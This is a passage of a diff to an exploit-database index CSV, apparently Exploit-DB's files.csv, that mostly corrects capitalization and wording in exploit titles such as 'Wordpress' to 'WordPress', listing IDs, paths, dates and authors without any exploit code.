of Service (4)",2004-09-27,"Ken Hollis",windows,dos,0 -24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex GuestBook 3.12 - Remote PHP File Include",2004-09-27,"Himeur Nourredine",php,webapps,0 +24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include",2004-09-27,"Himeur Nourredine",php,webapps,0 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (1)",2004-09-28,"securma massine",windows,dos,0 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0 -24641,platforms/php/webapps/24641.txt,"Wordpress 1.2 - wp-login.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24642,platforms/php/webapps/24642.txt,"Wordpress 1.2 - admin-header.php redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24643,platforms/php/webapps/24643.txt,"Wordpress 1.2 - bookmarklet.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24644,platforms/php/webapps/24644.txt,"Wordpress 1.2 - categories.php cat_ID Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24645,platforms/php/webapps/24645.txt,"Wordpress 1.2 - edit.php s Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24646,platforms/php/webapps/24646.txt,"Wordpress 1.2 - edit-comments.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - wp-login.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - admin-header.php redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - bookmarklet.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24644,platforms/php/webapps/24644.txt,"WordPress 1.2 - categories.php cat_ID Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24645,platforms/php/webapps/24645.txt,"WordPress 1.2 - edit.php s Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24646,platforms/php/webapps/24646.txt,"WordPress 1.2 - edit-comments.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24647,platforms/php/webapps/24647.txt,"parachat 5.5 - Directory Traversal",2004-09-28,"Donato Ferrante",php,webapps,0 24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 - a redir_url.php key Parameter SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 - a forgot_password.php userid Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 @@ -21812,7 +21813,7 @@ id,file,description,date,author,platform,type,port 24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation",2004-10-04,"Eric Lackey",multiple,remote,0 24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote,0 -24657,platforms/php/webapps/24657.txt,"BlackBoard Internet Newsboard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0 +24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0 24658,platforms/php/webapps/24658.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2004-10-06,"Pedro Sanches",php,webapps,0 24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 @@ -21822,7 +21823,7 @@ id,file,description,date,author,platform,type,port 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - calendar.php HTTP Response Splitting",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,asp,webapps,0 -24667,platforms/php/webapps/24667.txt,"Wordpress 1.2 - wp-login.php HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 +24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - wp-login.php HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 24668,platforms/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service",2004-10-07,"Luigi Auriemma",multiple,dos,0 24669,platforms/linux/remote/24669.txt,"MySQL 3.x/4.x - ALTER TABLE/RENAME Forces Old Permission Checks",2004-10-08,"Oleksandr Byelkin",linux,remote,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 @@ -21843,7 +21844,7 @@ id,file,description,date,author,platform,type,port 24685,platforms/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps,0 24686,platforms/windows/remote/24686.txt,"Microsoft Outlook 2003 - Security Policy Bypass",2004-10-18,http-equiv,windows,remote,0 24687,platforms/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Plaintext Email Security Policy Bypass",2004-10-18,http-equiv,windows,remote,0 -24688,platforms/windows/remote/24688.pl,"best software saleslogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 +24688,platforms/windows/remote/24688.pl,"best software SalesLogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting / HTML Injection",2004-10-18,"Juan C Calderon",unix,webapps,0 24691,platforms/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service",2004-10-19,"Luigi Auriemma",multiple,dos,0 @@ -21854,24 +21855,24 @@ id,file,description,date,author,platform,type,port 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",linux,remote,0 24696,platforms/linux/dos/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)",2004-11-21,"Richard Hart",linux,dos,0 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x - exit.php HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0 -24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 -24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - .WAV File Handler Denial of Service",2004-10-22,HexView,windows,dos,0 +24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 +24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps,0 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Cross-Site Scripting / Connection Proxy",2004-10-25,"Joxean Koret",multiple,remote,0 24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 - Wiki.php Cross-Site Scripting",2004-10-25,"Jeremy Bae",php,webapps,0 -24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal",2004-10-25,anonymous,cgi,webapps,0 +24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,cgi,webapps,0 24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0 -24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos,0 +24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos,0 24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search - Cross-Site Scripting",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 -24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps,0 +24889,platforms/php/webapps/24889.txt,"WordPress Mathjax Latex Plugin 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps,0 24890,platforms/windows/remote/24890.rb,"ActFax 5.01 - RAW Server Buffer Overflow",2013-03-26,Metasploit,windows,remote,0 24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 -24711,platforms/php/remote/24711.php,"PHP 4.x/5 - cURL Open_Basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 -24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 - TABLE Status Bar URI Obfuscation",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 +24711,platforms/php/remote/24711.php,"PHP 4.x/5 - cURL open_basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 +24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6 - TABLE Status Bar URI Obfuscation",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 24713,platforms/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 - IP Filter Bypass",2004-10-29,anonymous,multiple,remote,0 -24714,platforms/windows/remote/24714.txt,"Microsoft Internet Explorer 6.0 - HTML Form Tags URI Obfuscation",2004-10-30,http-equiv,windows,remote,0 +24714,platforms/windows/remote/24714.txt,"Microsoft Internet Explorer 6 - HTML Form Tags URI Obfuscation",2004-10-30,http-equiv,windows,remote,0 24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0 24716,platforms/osx/remote/24716.txt,"Apple Safari 1.2 Web Browser - TABLE Status Bar URI Obfuscation",2004-11-01,"Gilbert Verdian",osx,remote,0 24717,platforms/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps,0 @@ -21883,7 +21884,7 @@ id,file,description,date,author,platform,type,port 24724,platforms/multiple/remote/24724.c,"Monolith Lithtech Game Engine - Multiple Remote Format String Vulnerabilities",2004-11-05,"Luigi Auriemma",multiple,remote,0 24725,platforms/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure",2004-11-05,DokFLeed,multiple,remote,0 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 -24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6.0 - Local Resource Enumeration",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 +24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6 - Local Resource Enumeration",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 24728,platforms/windows/remote/24728.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 @@ -21921,7 +21922,7 @@ id,file,description,date,author,platform,type,port 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0 24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 -24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,php,webapps,0 +24766,platforms/php/webapps/24766.txt,"Nuked-klaN 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,php,webapps,0 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow",2004-11-23,"Luigi Auriemma",windows,remote,0 24768,platforms/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - record Parameter SQL Injection",2004-11-23,"James Bercegay",php,webapps,0 24769,platforms/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"James Bercegay",php,webapps,0 @@ -21930,7 +21931,7 @@ id,file,description,date,author,platform,type,port 24772,platforms/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",php,webapps,0 24773,platforms/jsp/webapps/24773.txt,"JSPWiki 2.1 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",jsp,webapps,0 24774,platforms/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow",2004-11-24,"Donato Ferrante",multiple,remote,0 -24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6.0 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 +24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 24777,platforms/linux/dos/24777.txt,"Linux Kernel 2.4.x / 2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities",2004-11-25,"Florian Heinz",linux,dos,0 24778,platforms/multiple/dos/24778.html,"Sun Java Applet 1.x - Invocation Version Specification",2004-11-25,"Peter Greenwood",multiple,dos,0 @@ -21941,29 +21942,29 @@ id,file,description,date,author,platform,type,port 24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal",2004-11-26,"John Cobb",php,webapps,0 24784,platforms/linux/remote/24784.txt,"File ELF 4.x - Header Unspecified Buffer Overflow",2004-11-29,anonymous,linux,remote,0 24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash (PoC)",2013-03-15,metacom,windows,dos,0 -24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 +24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple Vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 24813,platforms/linux/remote/24813.pl,"gnu wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash (PoC)",2013-03-15,"John Cobb",windows,dos,0 -24789,platforms/php/webapps/24789.rb,"Wordpress LeagueManager Plugin 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps,0 +24789,platforms/php/webapps/24789.rb,"WordPress LeagueManager Plugin 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps,0 24790,platforms/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,php,webapps,0 24791,platforms/java/webapps/24791.txt,"Open-Xchange Server 6 - Multiple Vulnerabilities",2013-03-15,"Martin Braun",java,webapps,0 24792,platforms/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",multiple,webapps,0 24793,platforms/multiple/dos/24793.txt,"JanaServer 2 - Multiple Remote Denial of Service Vulnerabilities",2004-11-30,"Luigi Auriemma",multiple,dos,0 24794,platforms/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 24795,platforms/linux/remote/24795.txt,"RSSH 2.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 -24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Remote Directory Traversal",2004-12-02,"Steve Kemp",php,webapps,0 -24797,platforms/php/webapps/24797.txt,"Advanced GuestBook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 +24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Directory Traversal",2004-12-02,"Steve Kemp",php,webapps,0 +24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Full Path Disclosure",2004-12-04,y3dips,php,webapps,0 -24799,platforms/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 +24799,platforms/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial Of Service",2004-12-06,"Niek van der Maas",multiple,dos,0 24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 - FTP URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 24801,platforms/linux/remote/24801.txt,"KDE FTP - KIOSlave URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",linux,remote,0 -24802,platforms/windows/remote/24802.txt,"Microsoft Internet Explorer 6.0 - Sysimage Protocol Handler Local File Detection",2004-12-07,"Gregory R. Panakkal",windows,remote,0 +24802,platforms/windows/remote/24802.txt,"Microsoft Internet Explorer 6 - Sysimage Protocol Handler Local File Detection",2004-12-07,"Gregory R. Panakkal",windows,remote,0 24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 - BTDownload.php Cross-Site Scripting",2004-12-07,Lostmon,php,webapps,0 24804,platforms/linux/dos/24804.c,"Linux Kernel 2.6.x - 'AIO_Free_Ring' Local Denial of Service",2004-12-07,"Darrick J. Wong",linux,dos,0 24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 - WAHTTP Server Remote Denial of Service",2004-12-07,"Evgeny Demidov",multiple,dos,0 24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal",2004-12-07,"John Bissell",php,webapps,0 24807,platforms/multiple/dos/24807.txt,"MD5 - Message Digest Algorithm Hash Collision",2004-12-07,"Dan Kaminsky",multiple,dos,0 -24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6.0 - Search Pane URI Obfuscation",2004-12-08,http-equiv,windows,remote,0 +24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6 - Search Pane URI Obfuscation",2004-12-08,http-equiv,windows,remote,0 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PHPGedView 2.x - Descendancy.php Cross-Site Scripting",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - FSMSH.dll CGI Application Installation Full Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote,0 @@ -21977,10 +21978,10 @@ id,file,description,date,author,platform,type,port 24821,platforms/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - Gedrecord.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24822,platforms/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - Gdbi_interface.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 -24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.threads 6.2.3/6.5 - showflat.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 - calendar.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - showflat.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - calendar.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos,0 24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php' Username Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 @@ -21998,40 +21999,40 @@ id,file,description,date,author,platform,type,port 24841,platforms/windows/dos/24841.txt,"Adobe Acrobat/Acrobat Reader 6.0 - ETD File Parser Format String",2004-12-14,"Greg MacManus",windows,dos,0 24842,platforms/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injections",2004-12-15,"Shervin Khaleghjou",php,webapps,0 24843,platforms/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,osx,dos,0 -24844,platforms/php/webapps/24844.txt,"PHPGroupWare 0.9.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 -24845,platforms/php/webapps/24845.txt,"PHPGroupWare 0.9.x - viewticket_details.php ticket_id Parameter Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 -24846,platforms/php/webapps/24846.txt,"PHPGroupWare 0.9.x - viewticket_details.php ticket_id Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 -24847,platforms/php/webapps/24847.txt,"PHPGroupWare 0.9.x - 'index.php' Multiple Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 +24844,platforms/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 +24845,platforms/php/webapps/24845.txt,"phpGroupWare 0.9.x - viewticket_details.php ticket_id Parameter Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 +24846,platforms/php/webapps/24846.txt,"phpGroupWare 0.9.x - viewticket_details.php ticket_id Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 +24847,platforms/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0 -24850,platforms/php/webapps/24850.txt,"Wordpress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 +24850,platforms/php/webapps/24850.txt,"WordPress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 24851,platforms/php/webapps/24851.txt,"Joomla RSfiles Component (cid parameter) - SQL Injection",2013-03-18,ByEge,php,webapps,0 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 -24858,platforms/php/webapps/24858.html,"Wordpress Occasions Plugin 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 -24859,platforms/php/webapps/24859.rb,"Wordpress Count per Day Plugin 3.2.5 - (counter.php) Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 +24858,platforms/php/webapps/24858.html,"WordPress Occasions Plugin 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 +24859,platforms/php/webapps/24859.rb,"WordPress Count per Day Plugin 3.2.5 - (counter.php) Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id parameter' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id Parameter' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 -24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls - Double-free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",linux,dos,0 +24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls - Double-Free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",linux,dos,0 24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,hardware,dos,0 -24867,platforms/php/webapps/24867.html,"Wordpress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 -24868,platforms/php/webapps/24868.rb,"Wordpress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 +24867,platforms/php/webapps/24867.html,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 +24868,platforms/php/webapps/24868.rb,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 -24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme parameter) Local File Inclusion",2013-03-22,DaOne,php,webapps,0 +24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple 